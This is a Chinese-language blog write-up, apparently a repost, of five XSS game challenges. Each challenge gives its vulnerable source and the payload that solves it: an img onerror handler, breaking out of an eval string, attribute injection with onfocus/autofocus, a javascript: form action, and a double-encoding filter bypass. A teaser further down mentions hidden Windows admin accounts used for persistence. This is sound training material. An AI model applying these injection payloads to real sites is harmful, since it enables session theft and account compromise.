xss 漏洞复现

news2024/12/23 15:46:46

xss 漏洞复现

一,xss game

1,源码

<!-- Challenge -->
<h2 id="spaghet"></h2>
<script>
    spaghet.innerHTML = (new URL(location).searchParams.get('somebody') || "Somebody") + " Toucha Ma Spaghet!"
</script>

题目分析:接收somebody参数放入innerHTML,然后放在

标签展示。innerHTML标签中警用了script标签,所以使用标签。

?somebody=<img src=1 onerror="alert(1337)">

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

2,源码

<!-- Challenge -->
<h2 id="maname"></h2>
<script>
    let jeff = (new URL(location).searchParams.get('jeff') || "JEFFF")
    let ma = ""
    eval(`ma = "Ma name ${jeff}"`)
    setTimeout(_ => {
        maname.innerText = ma
    }, 1000)
</script>

//eval(`ma = "Ma name a";alert(1337);""`)

题目分析:innertext会把<>当成字符串解析,安全系数很高,此题危险方法是eval,进行闭合操作。

思路一  ?jeff=a";alert(1337);"
思路二  ?jeff=a"-alert(1337);-"  连接符
       ?jeff=a"-alert(1337);"

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

3,源码

<!-- Challenge -->
<div id="uganda"></div>
<script>
    let wey = (new URL(location).searchParams.get('wey') || "do you know da wey?");
    wey = wey.replace(/[<>]/g, '')  //过滤了<>
    uganda.innerHTML = `<input type="text" placeholder="${wey}" class="form-control">`
</script>

题目分析:闭合"${wey}"处的双引号,加入我们的方法。

?wey=aaa"%20onfocus=alert(1337)%20autofocus="    
autofocus自动对焦
onfocus=alert(1337) 焦点存在时触发函数

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

4,源码

<!-- Challenge -->
<form id="ricardo" method="GET">
    <input name="milos" type="text" class="form-control" placeholder="True" value="True">
</form>
<script>
    ricardo.action = (new URL(location).searchParams.get('ricardo') || '#')
    setTimeout(_ => {
        ricardo.submit()
    }, 2000)  //两秒后自动提交
</script>

题目分析:表单的action处也会出现相应的伪协议事件,需要提交触发。

?ricardo=javascript:alert(1337)

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

5,源码

<!-- Challenge -->
<h2 id="will"></h2>
<script>
    smith = (new URL(location).searchParams.get('markassbrownlee') || "Ah That's Hawt")
    smith = smith.replace(/[\(\`\)\\]/g, '') 
    will.innerHTML = smith
</script>

题目分析:过滤了()`\ 双层编码() %2528 %2529 浏览器会转一次。加location识别编码

?markassbrownlee=<img%20src=1%20onerror=location="javascript:alert%25281337%2529">

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

img%20src=1%20οnerrοr=location=“javascript:alert%25281337%2529”>


[外链图片转存中...(img-INiW5cpV-1724041595122)]





本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2055111.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Centos7离线安装Sumo全过程(xerces-c、Cmake、gymnasium等)

在 Linux 环境下使用 Python 调用 SUMO 进行相关训练时&#xff0c;通常需要先安装 SUMO。然而&#xff0c;在某些情况下&#xff0c;网络连接可能不可用&#xff0c;因此本文提供了 SUMO 的离线安装方法。 Step1&#xff1a;检查基础依赖包是否完整 基本的依赖项如果有别的缺…

机械学习—零基础学习日志(如何理解概率论2)

全概率公式与贝叶斯公式 上面所提到的公式&#xff0c;可以使用上一篇文章的基本公式推导。 使用到了概率的基本运算公式。 完整的公式展示&#xff1a; 习题练习&#xff1a; 剩余的练习&#xff1a; 第二题解析&#xff1a; 第三题&#xff1a; 第四题&#xff1a; 注意&…

酒店管理系统设计与实现(源码+lw+部署文档+讲解等)

文章目录 前言具体实现截图详细视频演示技术栈系统测试为什么选择我官方认证玩家&#xff0c;服务很多代码文档&#xff0c;百分百好评&#xff0c;战绩可查&#xff01;&#xff01;入职于互联网大厂&#xff0c;可以交流&#xff0c;共同进步。有保障的售后 代码参考数据库参…

Navicat Premium Lite: 简化版的数据库管理和开发工具

Navicat Premium 一直是世界各地数据库专业人士需要从一个应用程序同时连接到多种数据库平台的选择。现在&#xff0c;Navicat Premium Lite 为只需要基本数据库操作所需的核心功能的用户提供简化版的数据库管理体验。在今天的博客中&#xff0c;我们将介绍 Navicat Premium Li…

【案例46】Oracle更换数据库密码后产生Library Cache Lock导致系统卡死

问题现象 WAS环境&#xff0c;服务起不来&#xff0c;改成单机版后能登录&#xff0c;打不开节点。直接卡死。 问题分析 经过顾问反馈&#xff0c;在启动环境时&#xff0c;中间件卡住不动&#xff0c;怀疑数据源不通导致&#xff0c;于是使用checkDB脚本发现desgin数据源用…

leaflet如何为geoJson图层设置zIndex图层顺序?

这个问题也是纠结了半天&#xff0c;两个geojson的面图层作为Layer&#xff0c;因所画的内容重要程度不同&#xff0c;总有主次之分&#xff0c;比如标记型的图标&#xff0c;即使被盖住了&#xff0c;也无伤大雅&#xff0c;但是一些监控或者告警的数据&#xff0c;如果被盖住…

Stable Diffusion绘画 | ControlNet应用-Scribble (涂鸦)

Scribble (涂鸦) 使用该算法生成的线稿&#xff0c;线条最粗最随意&#xff0c;常用于抓取画面的大体轮廓&#xff0c;让AI进行创意发挥。 提示词输入 a panda&#xff0c;生成图片如下&#xff1a; 将提示词换成 a dog&#xff0c;生成图片如下&#xff1a; 今天先分享到这里…

海康相机opencv,C++调用demo配置记录

海康相机opencv&#xff0c;C调用demo配置记录 配置&#xff1a;1.Opencv4.6.0 2.MVS 3.Vs2019 第一章、相关文件 一、demo文件 在安装好mvs后&#xff0c;相应文件夹中&#xff0c;会有样例文件。默认安装mvs的话&#xff0c;文件在目录&#xff1a; C:\Program Files (x…

C++:C/C++的内存管理

目录 C/C内存分布 C语言中动态内存管理方式 C内存管理方式 new/delete操作内置类型 new/delete操作自定义类型 operator new与operator delete函数 new和delete的实现原理 定位new表达式 常见问题 malloc/free和new/delete的区别 内存泄漏 C/C内存分布 我们先来看以…

STM32 定时器 输入捕获

用于测频率测占空比 IC(Input Capture)输入捕获 输入捕获模式下&#xff0c;当通道输入引脚出现指定电平跳变&#xff08;上升沿/下降沿&#xff09;时&#xff0c;会让当前CNT的值将被锁存到CCR中&#xff0c;可用于测量PWM波形的频率、占空比、脉冲间隔、电平持续时间等参数…

探索ChatGPT:一场AI语言模型的革命

前言 随着人工智能&#xff08;AI&#xff09;的不断发展&#xff0c;越来越多的技术在日常生活和工作中得到了广泛应用&#xff0c;ChatGPT作为一种基于GPT-4架构的自然语言处理模型&#xff0c;正引领着AI对话系统的新时代。本文将带你深入了解ChatGPT的背景、应用以及未来发…

python动画:矢量图形的体系结构演示

总体来说&#xff0c;这些类构成了一个支持矢量图形的体系结构&#xff0c;提供了创建、管理和操作数学对象的灵活性。描述使用矢量图形的 Mobject&#xff08;数学对象&#xff09;的术语。这些对象在动画和数学绘图领域常用于创建灵活和可扩展的图形。 1.CurvesAsSubmobject…

中学理化生实验室设备仪器配置及实验应用

中学理化生实验室设备涵盖了物理、化学和生物三个学科所需的多种仪器、设备和材料&#xff0c;实验室设备的种类丰富多样&#xff0c;涵盖了从基础配备到专业配置再到实验应用等各种需求。以下是对这些设备的配置分类和具体实验应用的描述。 中学理化生实验室设备仪器配置 中…

一起学习CAN总线之物理层协议(2)

附&#xff1a;ISO 11898-1:2024和ISO11898-2:2024标准下载 一起学习CAN总线之物理层协议&#xff08;2&#xff09; CAN总线物理层主要完成节点间信号的传送&#xff0c;把各种信息转换成可以传输的物理电平&#xff0c;并将信号传输到其他的目标设备上。CAN总线传输介质&…

智慧排水远程监测系统物联网解决方案

智慧排水监测系统是一种集成了现代信息技术、物联网技术、大数据分析及云计算能力的高效城市排水管理解决方案。该系统通过全面、实时地监控城市排水网络的运行状态&#xff0c;旨在预防内涝灾害&#xff0c;优化水资源管理&#xff0c;保障城市安全运行&#xff0c;促进可持续…

零基础如何入门网络安全?网络安全难吗?

零基础如何入门网络安全 我经常会看到这一类的问题&#xff1a; 学习XXX知识没效果&#xff1b;学习XXX技能没方向&#xff1b;学习XXX没办法入门&#xff1b; 给大家一个忠告&#xff0c;如果你完全没有基础的话&#xff0c;前期最好不要盲目去找资料学习&#xff0c;因为大…

windows系统如何走后面之windows系统隐藏账户

系统隐藏账户是一种最为简单有效的权限维持方式&#xff0c;其做法就是让攻击者创建一个新的具有管理员权限的隐藏账户&#xff0c;因为是隐藏账户&#xff0c;所以防守方是无法通过控制面板或命令行看到这个账户的。 自然我们需要一些前提条件&#xff0c;比如说有一个网站&am…

【unity小技巧】获取免费开源的人物模型,并为obj fbx人物模型绑定骨骼、动画——mixamo的使用介绍

文章目录 前言地址上传自己的3D角色下载单动画下载动作包角色模型导入Unity动画导入unity设置动画骨骼动画骨骼不配的问题参考完结 前言 其实前面我已经推荐了几种获取人物模型的方法&#xff1a; 1、【unity小技巧】下载原神模型&#xff0c;在Blender中PMX模型转FBX模型&…

【GitLab】使用 Docker engine安装 GitLab 2: gitlab-ce:17.3.0-ce.0 拉取

ce版本必须配置代理。 极狐版本可以直接pull 社区版GitLab不支持Alibaba Cloud Linux 3,本操作以Ubuntu/Debian系统为例进行说明,其他操作系统安装说明,请参见安装社区版GitLab。 docker 环境重启 sudo systemctl daemon-reload sudo systemctl restart docker脚本安装 安裝…

一文带你打通WSL下的SSH连接

写在文章开头 Windows下Linux子系统即WSL已经成为笔者调试Linux程序的常用方式&#xff0c;默认情况下WSL是没有安装SSH服务的&#xff0c;所以对于常见的SSH客户端我们无法做到连接管理调试(除了笔者最爱的Mobaxterm)&#xff0c;所以笔者专门以此文章来分享一下笔者WSL配置S…